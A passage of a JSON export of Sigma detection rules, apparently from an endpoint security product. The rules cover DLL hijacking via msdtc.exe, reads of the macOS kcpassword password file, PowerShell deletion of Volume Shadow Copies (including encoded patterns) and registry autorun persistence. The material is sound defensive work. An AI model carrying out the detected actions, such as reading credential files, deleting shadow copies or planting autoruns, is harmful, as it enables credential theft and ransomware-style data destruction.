ImageLoaded|endswith:\n - '\\CLUSAPI.dll'\n - '\\DNSAPI.dll'\n - '\\ktmw32.dll'\n - '\\MSDTCTM.dll'\n - '\\MTXCLU.DLL'\n - '\\oci.dll'\n - '\\RESUTILS.dll'\n - '\\XOLEHLP.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n - '*\\docker\\windowsfilter\\\\*\\Files\\Windows\\System32\\'\n - '*\\docker\\windowsfilter\\\\*\\Files\\Windows\\Syswow64\\'\n filter_signature_imageloaded:\n Signed: 
'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "fca3a43d-b571-4277-91e9-109e94c8ef22",
"rule_name": "DLL Hijacking via msdtc.exe",
"rule_description": "Detects potential Windows DLL Hijacking via msdtc.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "fcbc82c7-c83f-40e4-891d-7804e51e594a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.617248Z",
"creation_date": "2026-03-23T11:45:34.617250Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.617255Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.offsec.com/blog/in-the-hunt-for-the-macos-autologin-setup-process/",
"https://attack.mitre.org/techniques/T1552/001/"
],
"name": "t1552_004_autologon_password_read.yml",
"content": "title: Suspicious Access to macOS Autologon Password File\nid: fcbc82c7-c83f-40e4-891d-7804e51e594a\ndescription: |\n Detects an attempt to read the content of the kcpassword file which holds users' passwords when autologin is enabled.\n Adversaries may access the autologon file to acquire credentials in order to impersonate users or elevate privileges.\n It is recommended to check for malicious behavior by the process accessing the file.\nreferences:\n - https://www.offsec.com/blog/in-the-hunt-for-the-macos-autologin-setup-process/\n - https://attack.mitre.org/techniques/T1552/001/\ndate: 2024/06/18\nmodified: 2025/10/29\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1552.001\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.SensitiveInformation\n - classification.macOS.Behavior.CredentialAccess\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_version:\n # define minimum version for each branches\n - AgentVersion|gte|version: 3.6.13\n AgentVersion|lt|version: 3.7.0\n - AgentVersion|gte|version: 3.7.11\n AgentVersion|lt|version: 3.8.0\n - AgentVersion|gte|version: 3.8.3\n AgentVersion|lt|version: 3.9.0\n # all versions above are patched\n - AgentVersion|gte|version: 3.9.0\n selection_file:\n Path: '/Private/etc/kcpassword'\n selection_read_access:\n Kind: 'read'\n ProcessImage|contains: '?'\n\n # Common exclusion\n ### system app ###\n filter_systemapp:\n Image:\n - '/System/Library/Services/*'\n - '/System/Library/PrivateFrameworks/*'\n - '/System/Library/CoreServices/*'\n - '/System/Library/Frameworks/CoreServices.framework/*'\n - '/System/Library/ExtensionKit/Extensions/*'\n - '/System/Library/Frameworks/*'\n - '/usr/sbin/filecoordinationd'\n\n exclusion_systemextension:\n Image|startswith: '/Library/SystemExtensions/????????-????-????-????-????????????/'\n\n exclusion_virtualization:\n Image: 
'/System/Library/Frameworks/Virtualization.framework/Versions/A/XPCServices/com.apple.Virtualization.VirtualMachine.xpc/Contents/MacOS/com.apple.Virtualization.VirtualMachine'\n\n ### security tools ###\n\n exclusion_hurukai:\n Image: '/Applications/HarfangLab Hurukai.app/Contents/MacOS/hurukai'\n\n exclusion_fortinet:\n Image:\n - '/Library/Application Support/Fortinet/FortiClient/bin/fmon2.app/Contents/MacOS/fmon2'\n - '/Library/Application Support/Fortinet/FortiClient/bin/fcaptmon'\n - '/Library/Application Support/Fortinet/FortiClient/bin/scanunit'\n\n exclusion_microsoft_defender:\n Image:\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon_enterprise.app/Contents/MacOS/wdavdaemon_enterprise'\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon'\n\n exclusion_fsecure:\n Image:\n - '/usr/local/f-secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - '/Library/F-Secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - '/Library/F-Secure/bin/fsavd.app/Contents/MacOS/fsavd'\n\n exclusion_bitdefender:\n Image: '/Library/Bitdefender/AVP/product/bin/BDLDaemon.app/Contents/MacOS/BDLDaemon'\n\n exclusion_eset:\n Image:\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_sci'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_gui'\n - '/Applications/ESET Endpoint Antivirus.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Cyber Security.app/Contents/MacOS/esets_daemon'\n\n exclusion_withssecure:\n Image:\n - '/Library/WithSecure/bin/wsesproviderd.xpc/Contents/MacOS/wsesproviderd'\n - '/Library/WithSecure/bin/wsavd.app/Contents/MacOS/wsavd'\n\n exclusion_sentinel:\n Image: '/Library/Sentinel/sentinel-agent.bundle/Contents/MacOS/sentineld_helper.app/Contents/MacOS/sentineld_helper'\n\n exclusion_avast:\n Image: 
'/Applications/Avast.app/Contents/Backend/utils/com.avast.Antivirus.EndpointSecurity.app/Contents/MacOS/com.avast.Antivirus.EndpointSecurity'\n\n exclusion_trend:\n Image: '/Applications/TrendMicroSecurity.app/Contents/Resources/iCoreService.app/Contents/MacOS/iCoreService'\n\n exclusion_sophos:\n Image: '/Library/Sophos Anti-Virus/SophosScanAgent.app/Contents/MacOS/SophosScanAgent'\n\n ### backup sofware ###\n exclusion_arq:\n Image: '/Applications/Arq.app/Contents/Resources/ArqAgent.app/Contents/MacOS/ArqAgent'\n\n # AtempoLiveNavigator\n exclusion_hnagent:\n Image: '/Library/Application Support/HN/base/bin/HNagent'\n\n exclusion_wddesktop:\n Image:\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/kdd'\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/wdsync'\n\n ### misc\n exclusion_vscode:\n Image:\n - '/Applications/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n - '/Users/*/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n# end common exclusion\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "fcbc82c7-c83f-40e4-891d-7804e51e594a",
"rule_name": "Suspicious Access to macOS Autologon Password File",
"rule_description": "Detects an attempt to read the content of the kcpassword file which holds users' passwords when autologin is enabled.\nAdversaries may access the autologon file to acquire credentials in order to impersonate users or elevate privileges.\nIt is recommended to check for malicious behavior by the process accessing the file.\n",
"rule_creation_date": "2024-06-18",
"rule_modified_date": "2025-10-29",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1552.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "fcd5dfad-3e40-4d1a-9173-728d269423d0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.070142Z",
"creation_date": "2026-03-23T11:45:34.070145Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.070150Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1490/"
],
"name": "t1490_powershell_delete_shadowcopy.yml",
"content": "title: Volume Shadow Copies Deleted via PowerShell\nid: fcd5dfad-3e40-4d1a-9173-728d269423d0\ndescription: |\n Detects an attempt to delete Volume Shadow Copies (VSS) using PowerShell via command-line.\n Attackers often delete VSS before encrypting drives with ransomware to prevent data recovery.\n The selection only matches Windows PowerShell (powershell.exe / OriginalFileName PowerShell.EXE); PowerShell 7 (pwsh.exe) is not covered.\n It is recommended to analyze the process responsible for the deletion to look for malicious content and for other actions linked to ransomware activity.\nreferences:\n - https://attack.mitre.org/techniques/T1490/\ndate: 2020/12/10\nmodified: 2025/01/09\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1490\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.VolumeShadowCopy\n - classification.Windows.Behavior.Deletion\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n - Image|endswith: '\\powershell.exe'\n - OriginalFileName: 'PowerShell.EXE'\n selection_clear:\n CommandLine|contains|all:\n - 'Win32_Shadowcopy'\n - '.Delete('\n selection_b64_1:\n CommandLine|contains:\n # Win32_Shadowcopy in UTF16LE and base64 (+ 3 different offsets)\n - 'VwBpAG4AMwAyAF8AUwBoAGEAZABvAHcAYwBvAHAAeQ'\n - 'cAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkA'\n - 'XAGkAbgAzADIAXwBTAGgAYQBkAG8AdwBjAG8AcAB5A'\n # Win32_shadowcopy\n - 'VwBpAG4AMwAyAF8AcwBoAGEAZABvAHcAYwBvAHAAeQ'\n - 'cAaQBuADMAMgBfAHMAaABhAGQAbwB3AGMAbwBwAHkA'\n - 'XAGkAbgAzADIAXwBzAGgAYQBkAG8AdwBjAG8AcAB5A'\n # win32_shadowcopy\n - 'dwBpAG4AMwAyAF8AcwBoAGEAZABvAHcAYwBvAHAAeQ'\n #- 'cAaQBuADMAMgBfAHMAaABhAGQAbwB3AGMAbwBwAHkA' # same as for Win32_shadowcopy\n - '3AGkAbgAzADIAXwBzAGgAYQBkAG8AdwBjAG8AcAB5A'\n selection_b64_2:\n CommandLine|contains:\n # .Delete( in UTF16LE and base64 (+ 3 different offsets)\n - 'LgBEAGUAbABlAHQAZQAoA'\n - '4ARABlAGwAZQB0AGUAKA'\n - 'uAEQAZQBsAGUAdABlACgA'\n # .delete(\n - 'LgBkAGUAbABlAHQAZQAoA'\n - '4AZABlAGwAZQB0AGUAKA'\n - 
'uAGQAZQBsAGUAdABlACgA'\n selection_hex_1:\n CommandLine|contains:\n # Win32_Shadowcopy\n - '57696E33325F536861646F77636F7079'\n # Win32_shadowcopy\n - '57696E33325F736861646F77636F7079'\n # win32_shadowcopy\n - '77696E33325F736861646F77636F7079'\n selection_hex_2:\n CommandLine|contains:\n # .Delete(\n - '2E44656C65746528'\n # .delete(\n - '2E64656C65746528'\n\n condition: selection and (selection_clear or (all of selection_b64_*) or (all of selection_hex_*))\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "fcd5dfad-3e40-4d1a-9173-728d269423d0",
"rule_name": "Volume Shadow Copies Deleted via PowerShell",
"rule_description": "Detects an attempt to delete Volume Shadow Copies (VSS) using PowerShell via command-line.\nAttackers often delete VSS before encrypting drives with ransomware to prevent data recovery.\nThe selection only matches Windows PowerShell (powershell.exe / OriginalFileName PowerShell.EXE); PowerShell 7 (pwsh.exe) is not covered.\nIt is recommended to analyze the process responsible for the deletion to look for malicious content and for other actions linked to ransomware activity.\n",
"rule_creation_date": "2020-12-10",
"rule_modified_date": "2025-01-09",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1490"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "fd2e4d65-00d6-4661-a5f4-ad92fe8d4540",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.620422Z",
"creation_date": "2026-03-23T11:45:34.620424Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.620429Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1547/001/"
],
"name": "t1547_001_suspicious_persistence_registry_asep.yml",
"content": "title: Suspicious Registry Autorun Key Added\nid: fd2e4d65-00d6-4661-a5f4-ad92fe8d4540\ndescription: |\n Detects when a suspicious entry is added or modified in one of the autostart extensibility points (ASEP) in the registry, which may indicate an attempt to establish persistence.\n Autostart extensibility points are registry locations that Windows uses to automatically execute programs during system startup or user logon. Common ASEP locations include Run and RunOnce keys under \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\" and \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\". Attackers frequently abuse these registry keys to achieve persistence by adding entries that reference malicious executables, scripts, or commands. This technique allows malware to survive system reboots and maintain a foothold on the compromised system without requiring user interaction.\n It is recommended to investigate the process that created or modified the registry key, examine the target executable or command referenced in the registry value and verify whether the entry corresponds to legitimate software.\nreferences:\n - https://attack.mitre.org/techniques/T1547/001/\ndate: 2023/06/22\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1547.001\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection_key:\n EventType: 'SetValue'\n TargetObject|contains:\n # run keys: Run (this block), RunOnce and RunOnceEx (below); RunServices / RunServicesOnce are not matched by these patterns\n - '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\'\n - '\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\'\n # covers RunOnce and RunOnce\\Setup\n - '\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\'\n - '\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\'\n # 
covers RunOnceEx\\000x\\value and RunOnceEx\\000x\\Depend\\value\n - '\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\'\n - '\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\'\n\n selection_details:\n - Details|contains:\n - 'rundll32.exe'\n - 'pwsh.exe'\n - 'powershell.exe'\n - 'cmd.exe'\n - 'mshta.exe'\n - 'wscript.exe'\n - 'cscript.exe'\n - '\\AppData\\Roaming\\'\n - '\\Users\\Public\\'\n - '\\Users\\Default\\'\n - '\\PerfLogs\\'\n - Details|endswith:\n # wscript\n - '.js'\n - '.jse'\n - '.vbs'\n - '.vbe'\n - '.vb'\n - '.vba'\n - '.wsf'\n - '.wsh'\n # mshta\n - '.hta'\n # powershell\n - '.ps1'\n - '.psc1'\n - '.psm1'\n - '.psd1'\n # misc, behaves like .exe but uncommon\n - '.cmd'\n - '.com'\n - '.pif'\n - '.scr'\n\n # This is handled by the rule 907e5765-e7f7-4b8f-886c-749bf315fe52\n filter_remote:\n ProcessCommandLine:\n - '?:\\WINDOWS\\system32\\svchost.exe -k localService -p -s RemoteRegistry'\n - '?:\\Windows\\system32\\svchost.exe -k LocalService'\n - '?:\\Windows\\system32\\svchost.exe -k regsvc'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n # Exclusion for rundll32.exe\n exclusion_rundll32:\n Details:\n - 'rundll32.exe ?:\\WINDOWS\\system32\\eed_ec.dll,SpeedLauncher'\n - 'Rundll32.exe printui.dll,PrintUIEntry /m ?HP Delivery Driver? 
/dd /q'\n - 'rundll32.exe ?:\\windows\\system32\\iernonce.dll,RunOnceExProcess'\n - 'RunDll32.exe ??:\\Program Files\\\\*'\n - 'RunDll32.exe ??:\\Program Files (x86)\\\\*'\n\n exclusion_canon:\n # rundll32.exe DR201SVC.dll,EntryPointUserMessage\n # rundll32.exe DRC230SVC.dll, EntryPointUserMessage\n # rundll32.exe P208IISvc.dll, EntryPointUserMessage\n Details: 'rundll32.exe *EntryPointUserMessage'\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\CANON *'\n exclusion_wextract:\n Details: 'rundll32.exe ?:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 *'\n TargetObject|contains: '\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\wextract_cleanup'\n exclusion_f5:\n Details:\n - 'rundll32.exe ??:\\Windows\\Downloaded Program Files\\urxdialer.dll?,Run /cleanup'\n - 'rundll32.exe ??:\\Windows\\Downloaded Program Files\\\\*\\urxdialer.dll?,Run /cleanup'\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\F5 Networks VPN Cleanup {????????-????-????-????-????????????}'\n exclusion_logitech_1:\n ProcessImage: '?:\\Windows\\System32\\drvinst.exe'\n Details: '?:\\Windows\\system32\\rundll32.exe ?:\\Windows\\System32\\LogiLDA.dll,LogiFetch'\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Logitech Download Assistant'\n exclusion_fuji:\n ProcessCommandLine|contains:\n - '?:\\Program Files\\Fuji Medical System\\Synapse\\Workstation\\FujiFldL.dll'\n - '?:\\Program Files (x86)\\Fuji Medical System\\Synapse\\Workstation\\FujiFldL.dll'\n Details: 'RUNDLL32.EXE ?:\\PROGRA*\\FUJIME*\\Synapse\\WORKS*\\FujiFldL.dll,ConfigureSynapseUrlSearchHook'\n exclusion_streamci:\n ProcessImage: '?:\\WINDOWS\\servicing\\TrustedInstaller.exe'\n Details: 'rundll32.exe streamci,StreamingDeviceSetup {*},{*},{*}*'\n\n # Exclusion for cmd.exe\n exclusion_uninstall:\n Details: '?:\\windows\\system32\\cmd.exe /q /c rmdir /s /q *'\n TargetObject|contains: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Uninstall '\n 
exclusion_delete:\n Details: '?:\\Windows\\system32\\cmd.exe /q /c del /q *'\n TargetObject|contains:\n - '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Delete Cached Update Binary'\n - '\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Delete Cached Update Binary'\n - '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Delete Cached Standalone Update Binary'\n - '\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Delete Cached Standalone Update Binary'\n exclusion_msiexec:\n ProcessCommandLine:\n - '?:\\WINDOWS\\system32\\msiexec.exe /V'\n - '?:\\Windows\\System32\\MsiExec.exe -Embedding *'\n TargetObject|contains: '\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\'\n exclusion_nch:\n Details: 'cmd.exe /C rmdir *\\AppData\\Roaming\\NCH Software*'\n TargetObject|contains: '\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\ExpressZipUninstall'\n exclusion_sophos:\n ProcessSigned: 'true'\n ProcessSignature: 'Sophos Ltd'\n Details: 'cmd.exe /c IF EXIST ??:\\Program Files (x86)\\Sophos\\AutoUpdate\\SophosAlert.exe? start ?Sophos? /B ??:\\Program Files (x86)\\Sophos\\AutoUpdate\\SophosAlert.exe?'\n TargetObject: 'HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\SophosAlert'\n exclusion_softmon:\n ProcessImage: '?:\\Program Files (x86)\\LANDesk\\LDClient\\SoftMon.exe'\n Details:\n - '??:\\Program Files (x86)\\LANDesk\\LDClient\\softmon.exe? /r ?:\\windows\\system32\\cmd.exe /q /c del *'\n - '??:\\Program Files (x86)\\LANDesk\\LDClient\\softmon.exe? 
/r ?:\\windows\\system32\\cmd.exe /q /c rmdir *'\n TargetObject:\n - '*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Uninstall *'\n - '*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Delete *'\n exclusion_bomgar:\n Details:\n - 'cmd.exe /C rd /S /Q * & reg.exe delete HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Bomgar_Cleanup_* /f'\n - 'cmd.exe /C del /Q * & reg.exe delete HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Bomgar_Cleanup_* /f'\n - 'cmd.exe /C del /Q * & wmic.exe /NAMESPACE:\\\\root\\default Class StdRegProv Call DeleteValue hDefKey=* sSubKeyName=?Software\\Microsoft\\Windows\\CurrentVersion\\Run? sValueName=?Bomgar_Cleanup_*'\n TargetObject: '*\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Bomgar_Cleanup_*'\n exclusion_ldmsremovetempdir:\n Details:\n - 'cmd.exe /C RD /S /Q ?:\\Users\\\\*\\AppData\\Local\\Temp\\$LDTmp$'\n - 'cmd.exe /C RD /S /Q ?:\\WINDOWS\\TEMP\\$LDTmp$'\n TargetObject: '*\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\LdmsRemoveTempDir'\n exclusion_mcafee:\n Details:\n - 'cmd.exe /C rmdir /s /q ??:\\ProgramData\\McAfee\\Endpoint Security?'\n - 'cmd.exe /C rmdir /s /q ??:\\Program Files (x86)\\McAfee\\Endpoint Security\\\\?'\n - 'cmd.exe /C rmdir /s /q ??:\\ProgramData\\McAfee\\Solidcore?'\n - 'cmd.exe /C rmdir /s /q ??:\\Program Files\\McAfee\\Solidcore?'\n TargetObject|endswith:\n - '\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\EPR_ENS_?'\n - '\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\EPR_MACC_?'\n exclusion_citrix:\n Details: 'PowerShell.exe -WindowStyle hidden -Command \"(Get-Item HKCU:\\Software\\Citrix\\UserProfileManager\\RegUwpApps).Property|%{Get-ItemPropertyValue HKCU:\\Software\\Citrix\\UserProfileManager\\RegUwpApps -name $_}|%{Add-AppxPackage -Register $_ -DisableDevelopmentMode}\"'\n TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\RegisterUwpApps'\n exclusion_citrix_userprofilemanager:\n ProcessImage: '?:\\Program 
Files\\Citrix\\User Profile Manager\\UserProfileManager.exe'\n exclusion_hp:\n Details: 'cmd.exe /c ?manage-bde.exe -resume C:?'\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Resume-bde-C'\n\n # Exclusion for wscript.exe\n exclusion_kaspersky:\n ProcessImage: '?:\\Windows\\SysWOW64\\regedit.exe'\n Details: 'wscript.exe //b ?:\\\\*\\UnKES.vbs'\n TargetObject: 'HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\UnKES'\n exclusion_appremover:\n ProcessImage|endswith: '\\rm.exe'\n Details:\n - 'wscript.exe *\\Temp\\AppRemover_RunBatchSilently.vbs*\\TEMP\\AppRemover_ToBeDelAfterReboot.bat'\n - 'wscript.exe *\\Temp\\AppRemover_RunBatchSilently.vbs*\\TEMP\\AppRemover_ToBeDelAfterReboot.bat?'\n TargetObject|endswith: '\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\AppRemover'\n exclusion_litetouch:\n Details: 'wscript.exe ??:\\MININT\\Scripts\\LiteTouch.wsf?'\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\LiteTouch'\n\n # Exclusion for \\AppData\\Roaming\\\n exclusion_ISI-Com:\n Details|endswith: '\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\ISI-Com\\ISIPCB.appref-ms'\n TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ISIPCB'\n exclusion_myistra:\n # \\AppData\\Roaming\\Mediacom\\myIstra\\Bin\\myIstra.exe\n ProcessImage|endswith: '\\Bin\\myIstra.exe'\n Details|contains:\n - '\\AppData\\Roaming\\Mediacom\\myIstra\\Bin\\myIstra.exe'\n - '\\AppData\\Roaming\\Adista\\myIstra\\Bin\\myIstra.exe'\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\myIstra'\n exclusion_secureexchanges:\n # https://www.secure-exchanges.com/Home.aspx\n Details|endswith:\n - '\\AppData\\Roaming\\SecureExchanges\\SEWD\\900?_SEWD.exe\"'\n - '\\AppData\\Roaming\\SecureExchanges\\SEWD\\900?_SEWD.exe'\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\SecureExchanges'\n exclusion_webcompanion:\n # Here, we use 
\"contains\" instead of \"endswith\" because there may be some spaces at the end\n Details|contains: '\\AppData\\Roaming\\Lavasoft\\Web Companion\\Application\\WebCompanion.exe --minimize'\n TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Web Companion'\n exclusion_moveslink2:\n # Suunto device\n Details|endswith: '\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Suunto\\Moveslink2.appref-ms -auto'\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Moveslink2'\n exclusion_ixbus:\n Details|endswith: '\\AppData\\Roaming\\SRCI\\iXBus Websocket\\iXBus WebSocket.exe'\n TargetObject|endswith: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\iXBus WebSocket'\n exclusion_yealink:\n Details|endswith: '\\AppData\\Roaming\\Yealink\\Yealink Wireless Presentation Pod\\app\\PresentationLauncher.exe sys'\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\StartLoad'\n exclusion_cisco_1:\n Details|endswith:\n - '\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Webex\\Webex.lnk /minimized /autostartedWithWindows=true'\n - '\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Webex\\Webex.lnk? /minimized /autostartedWithWindows=true'\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\CiscoSpark'\n exclusion_zoom:\n ProcessSigned: 'true'\n ProcessSignature: 'Zoom Video Communications, Inc.'\n Details:\n - 